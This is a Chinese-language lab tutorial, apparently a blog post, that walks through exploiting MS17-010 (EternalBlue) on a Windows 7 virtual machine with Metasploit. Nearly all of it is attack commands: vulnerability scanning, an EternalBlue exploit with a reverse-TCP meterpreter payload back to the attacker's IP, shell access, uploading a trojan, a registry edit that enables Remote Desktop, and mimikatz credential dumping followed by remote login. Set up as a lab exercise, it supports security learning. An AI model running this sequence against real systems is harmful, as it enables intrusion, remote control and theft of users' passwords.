MSF之ms17-010永恒之蓝漏洞利用

准备

扫描漏洞

漏洞攻击

准备

实验准备环境:

被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙)

攻击机:虚拟机kali系统,其IP为:192.168.207.130

攻击工具:kali自带的msfconsole工具

扫描漏洞

在kali终端中输入msfconsole

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)

msf >set RHOSTS 10.101.2.11(设置被扫描IP)

msf >run(进行扫描,观察是否存在该漏洞)

8b803c24b70b52d6f8425d8809120e84.png

由上图可知,存在MS17-010漏洞

漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)

set RHOST 10.101.2.11(被攻击机IP)

set LHOST 192.168.207.130(设置本地IP)

set LPORT 4444(设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)

b6688e3e4b7f8fad90ed4989dbf3c16c.png

show options(查看配置相关信息)

ca2a21744e4b53a0dde9e5beadf0638e.png

129edd6160a0516b4361740812447863.png

meterpreter >exploit(开始攻击)

986d12fbc1cd6449b1b173b6aede893f.png

攻击成功!

sysinfo爆出系统信息

screenshot截屏,截屏后的图片存放在/root/中

meterpreter >shell,进入靶机cmd

c9a43d69f456a1c1199fa7b0de848ba5.png

此时,可以新建文件夹,然后

meterpreter >upload植入已经写好的木马!

也可以通过使用msf中的mimikatz,来爆出靶机的用户名和密码,以下是其过程:

首先

netstat -an< 查靶机端口开发情况>

880ac2162db61f18b37667746b4b2e16.png

如果没有开启3389端口,可以使用以下命令再cmd中开启:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

其次

meterpreter > load mimikatz

meterpreter > help

41511aa1c923e8487e131aaf3108ca94.png

meterpreter > msv

ace009b91f11e6c25ec5668aa7002d86.png

meterpreter > ssp

9df0473912f8c7b2613a5df3627d9f86.png

meterpreter > wdigest

8a8ec43b0427bfc61a4ff98e8916e77f.png

meterpreter > kerberos

d8c816b1743d0cf837caddf5db4c359a.png

接下来,就是远程登录靶机

rdesktop 10.101.2.11

346fbfe5f54263dbaab7c62ec6b3ff11.png

成功!

Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐